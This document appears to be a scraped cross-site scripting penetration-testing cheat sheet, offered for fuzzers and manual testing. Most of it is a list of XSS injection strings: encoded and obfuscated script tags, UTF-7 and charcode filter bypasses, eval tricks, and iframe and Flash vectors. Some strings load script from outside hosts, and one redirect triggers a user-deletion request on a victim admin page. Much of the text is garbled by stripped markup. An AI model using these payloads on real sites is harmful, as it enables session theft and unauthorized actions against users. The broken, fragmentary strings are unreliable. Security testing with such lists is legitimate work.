// Useful in case of payload restrictions. // Works up to IE7. // Works up to IE7. // Works up to IE7 click // By @secalert // By Mario // By @secalert click // By Ashar Javed // Works With All Browsers ">'> '';!--"=&{()} "> < XSS exp/* ¼script¾alert(¢XSS¢)¼/script¾ EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"> (Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. Setting the attributes allowScriptAccess="never" and allownetworking="internal" mitigates this risk (thanks to Jonathan Vanasco for the info). Note: Flash Player reached end-of-life in 2020 and current browsers no longer execute SWF content, so treat this vector as legacy-only.) a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); "> echo('alert("XSS")'); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- PT SRC="http://ha.ckers.org/xss.js"> XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS _________ _________.__ __ _________ .__ __ .__ \_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____ / \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\ \ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ > \______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ / \/ \/ \/ \/ \/ \/ \/ |__| \//_____/ Information: Many people asked us about our cross-site scripting pentest sheet for use in a fuzzer or in their own scripts. For good results, the following list can be fed to automated scripts and scanning software, or used for manual penetration testing. This list goes out to all friends, nerds, pentesters and exploiters. Please extend the list and we will update it soon. Note: This is a technical attack sheet for cross-site scripting penetration tests; use these strings only against systems you are authorized to test. Several entries are annotated with the browser or plugin they were verified in (e.g. IE7, IE8, Flash) — treat those as legacy-only, since they are not expected to fire in current browsers without the same conditions.
Cross Site Scripting Strings with TAG: CrossSiteScripting ¼script¾document.cookie=true;¼/script¾ exp/* ]] echo('document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- & &{document.cookie=true;}; < ; ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with close TAG: >" >" >" >" >" >" >" >" >" >" >"a=/CrossSiteScripting/\ndocument.cookie=true; >" >" >" >" >" >" >" >" >" >" >"CrossSiteScripting >"¼script¾document.cookie=true;¼/script¾ >" >" >" >" >" >" >" >" >" >" >"exp/* >" >" >" >" >" >" >"]] >" >" >" echo('document.cookie=true'); ?> >" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >" >" >" >" >" >" >"& >"&{document.cookie=true;}; >" >" >" >" >" >" >" >" >" >" >" >" >" >"< >" >" >" >" >" >"; >" ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with negative value & TAG: -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1CrossSiteScripting -1¼script¾document.cookie=true;¼/script¾ -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1exp/* -1 -1 -1 -1 -1 -1 -1]] -1 -1 -1 echo('document.cookie=true'); ?> -1 +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- -1 -1 -1 -1 -1 -1 -1& -1&{document.cookie=true;}; -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1< -1 -1 -1 -1 -1 -1; -1 ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings Restriction Bypass Mail: >"@gmail.com >"alert(document.cookie)@gmail.com @gmail.com 1337 "> 1337+1 Cross Site Scripting Strings Restriction Bypass Obfuscation >“ >" Cross Site Scripting Strings Restriction Bypass String to Charcode (String.fromCharCode) ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//-->">'> '';!--"=&{()} Cross Site 
Scripting Strings Restriction Bypass encoded frame url %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F%73%63%72%69%70%74%3E (percent-encoding of a script element that calls alert("CrossSiteScripting2"); the string must be sent as one token, without the line breaks the page layout had inserted) Cross Site Scripting Strings via Console: set vlan name 1337 set system name set system location ">alert('VL') insert add add user @gmail.com add topic add name perl -e 'print "";' > out perl -e 'print "alert(\"CrossSiteScripting\")";' > out Cross Site Scripting Strings on per line validation applications: Cross Site Scripting Strings Embed: Cross Site Scripting Strings Action Script: < PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"> "> +ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4- CrossSiteScripting CrossSiteScripting CrossSiteScripting CrossSiteScripting CrossSiteScripting \";alert('CrossSiteScripting');// ¼script¾alert(¢CrossSiteScripting¢)¼/script¾ exp/* a="get"; b="URL(\""; c="javascript:"; d="alert('CrossSiteScripting');\")"; eval(a+b+c+d); (corrected: the original read eval(v+l+a+b), which references the undefined variables v and l; only a, b, c and d are defined, matching the eval(a+b+c+d) form used earlier on this sheet) CrossSiteScripting ]]> <IMG SRC="javascript:alert('CrossSiteScripting')"> echo('alert("CrossSiteScripting")'); ?> Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser eval("prompt(3)") "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> [Click here](javascript:alert(1)) "> '|alert('xss')|' +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- #onmouseover=prompt(1) "> %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E <iframe src=http://test.de> <iframe src=http://test.de> PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+ (the same iframe element in percent-encoded, plain and base64 form — useful for checking which decoding layers a filter applies) javascript:alert(1) "> "> "> /onstart=confirm(1)> // Save // Works with IE8 . // Save // Works with IE8 .
. // Save // Works with IE8 .
.